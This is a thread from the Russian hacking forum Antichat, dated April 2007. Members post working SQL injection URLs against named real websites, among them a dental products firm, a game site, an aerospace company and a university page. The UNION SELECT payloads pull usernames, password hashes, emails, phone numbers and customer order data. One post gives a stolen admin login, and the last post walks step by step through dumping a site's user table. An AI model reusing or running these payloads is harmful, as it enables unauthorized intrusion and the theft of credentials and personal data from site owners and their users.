08.04.2007, 00:58
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
=\\ http://www.kuraraydental.com/
Inj:
http://www.kuraraydental.com/viewproduct.php?pid=-19+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12+from+user
Админку не искал. Погонять по лимиту, можно выцепить других юзеров.
admin:chris-ko
Последний раз редактировалось [sL1p]; 08.04.2007 в 10:21..
Причина: мда
|
|
|
08.04.2007, 01:28
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
[sL1p], _ttp://radata.com я выложил на предыдущей странице :Р
|
|
|
|
08.04.2007, 11:13
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
http://www.barsavto.ru/?_pageid=8&cat_id=-1+union+select+USER()/*&id=158
http://www.svrauto.ru/?pageId='+union+select+1,2,3,convert(USER()+using+ cp1251),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9/*
чет накаких интересны таблиц ненашёл
|
|
|
|
08.04.2007, 12:10
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
Код:
http://www.realhit.ru/?page=news&id=-1+union+select+null,version(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,database(),null/*
http://www.realhit.ru/?page=news&id=-1+union+select+null,user(),null/*
|
|
|
|
08.04.2007, 14:21
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
mafiaclub.ru
Код:
http://www.mafiaclub.ru/gallery/user.php?gid=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb_users+limit+1,1/*
phpbb хеш админа
там 5 админов, перебор лимитами.
Последний раз редактировалось n1†R0x; 08.04.2007 в 14:23..
|
|
|
|
08.04.2007, 14:37
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,4,5,6,7+from+orders/*
http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(name,char(58),email,char(58),phone),5,6,7+from+orders/*
|
|
|
|
08.04.2007, 14:50
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
Код:
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
|
|
|
|
08.04.2007, 14:55
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028
Репутация:
2371
|
|
Территория
===============
www.it-territory.ru
===============
Код:
http://www.it-territory.ru./index.php?obj=press&id=136+union+select+1,version(),3,4/*
Список статей, самый низ
Кто достанет нам новый апдейт Территории? 
|
|
|
|
08.04.2007, 15:29
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.sequelvc.com/index.php?page=news&id=843+union+select+concat(database(),0x3a,version()),2/*
Код:
http://www.vingarbutt.com/index.php?page=news&more=1&id=-69+union+select+1,2,3,4,5,6,7,email,9,10+from+users+limit+5/*
Код:
http://www.iratiwanti.org/iratiwanti.php3?page=news&id=-242+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|
|
08.04.2007, 16:17
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Опять времени много =)
Цель - www.gamesplay.ru
Заходим по первой попавшейся ссылке. Видно, что движок самописный... Сразу же начинаем пихать левые параметры...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 21-1
Название игры не меняется, так как за вывод названия отвечает другая переменная. Меняется само описание, так что все ок!
Подбираем стотлбцы и зануляем запрос.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20+order+by+5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20+union+select+1,2,3,4,5
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,3,4,5
Теперь пробуем вывести чуток данных из таблицы.
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,user(),4,5
Облом, други! Но мы то с вами не так себе, прорвемся! 
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(use r(),0x55),0x55),4,5
Теперь все ок. Ну а дальше...
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(col umn_name,0x55),0x55),4,5+from+information_schema.c olumns+where+table_name='users'
Итак, финал!
login : md5(pass) : mail : icq
http://www.gamesplay.ru/index.php?show=gameview&id=472&obzor=yes&obzorid=4 20000+union+select+1,2,aes_decrypt(aes_encrypt(con cat(user_login,char(58),user_pass,char(58),user_ma il,char(58),user_icq),0x55),0x55),4,5+from+users
PS Пользователей не считал, но очень много =) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
